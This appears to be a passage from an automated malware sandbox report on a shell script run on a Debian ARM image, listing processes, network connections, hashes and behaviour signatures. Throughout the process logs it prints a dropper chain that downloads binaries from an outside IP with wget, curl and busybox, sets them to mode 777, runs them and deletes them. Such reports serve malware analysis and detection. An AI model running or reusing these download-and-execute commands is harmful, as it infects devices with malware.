[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/chmod

[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2

[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/rm

[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/wget

[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/chmod

[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI

[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/rm

[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/wget

[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/chmod

[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw

[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/rm

[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 151.101.129.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 84.17.50.8:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:27

Reported

2024-10-25 01:31

Platform

debian9-armhf-20240611-en

Max time kernel

20s

Max time network

57s

Command Line

[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO N/A
N/A /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy N/A
N/A /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt N/A
N/A /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM N/A
N/A /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 N/A
N/A /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn N/A
N/A /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK N/A
N/A /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq N/A
N/A /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 N/A
N/A /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI N/A
N/A /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw N/A
N/A /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 N/A
N/A /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj N/A
N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj N/A
N/A /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /usr/bin/curl N/A
File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /usr/bin/curl N/A
File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /usr/bin/curl N/A
File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /usr/bin/curl N/A
File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /usr/bin/curl N/A
File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /usr/bin/curl N/A
File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /usr/bin/curl N/A
File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /usr/bin/curl N/A
File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /usr/bin/curl N/A
File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /usr/bin/curl N/A
File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /usr/bin/curl N/A
File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /usr/bin/curl N/A
File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /usr/bin/curl N/A
File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /usr/bin/curl N/A
File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /usr/bin/curl N/A
File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /usr/bin/curl N/A
File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /usr/bin/curl N/A

Processes

/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh

[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/chmod

[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/rm

[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/wget

[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/chmod

[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy

[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/rm

[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/chmod

[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt

[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/rm

[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/wget

[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/chmod

[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM

[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/rm

[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/wget

[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/chmod

[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2

[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/rm

[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/wget

[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/chmod

[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn

[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/rm

[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/wget

[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/chmod

[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK

[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/rm

[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/wget

[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/chmod

[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq

[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/rm

[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/wget

[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/chmod

[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2

[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/rm

[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/wget

[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/chmod

[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI

[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/rm

[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/wget

[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/chmod

[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw

[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/rm

[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/wget

[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/chmod

[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4

[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/rm

[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/wget

[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/chmod

[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj

[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/rm

[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/wget

[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/chmod

[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz

[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/rm

[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/wget

[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/chmod

[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz

[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/rm

[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/wget

[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/chmod

[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj

[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/rm

[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/wget

[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/chmod

[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM

[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/rm

[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/wget

[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
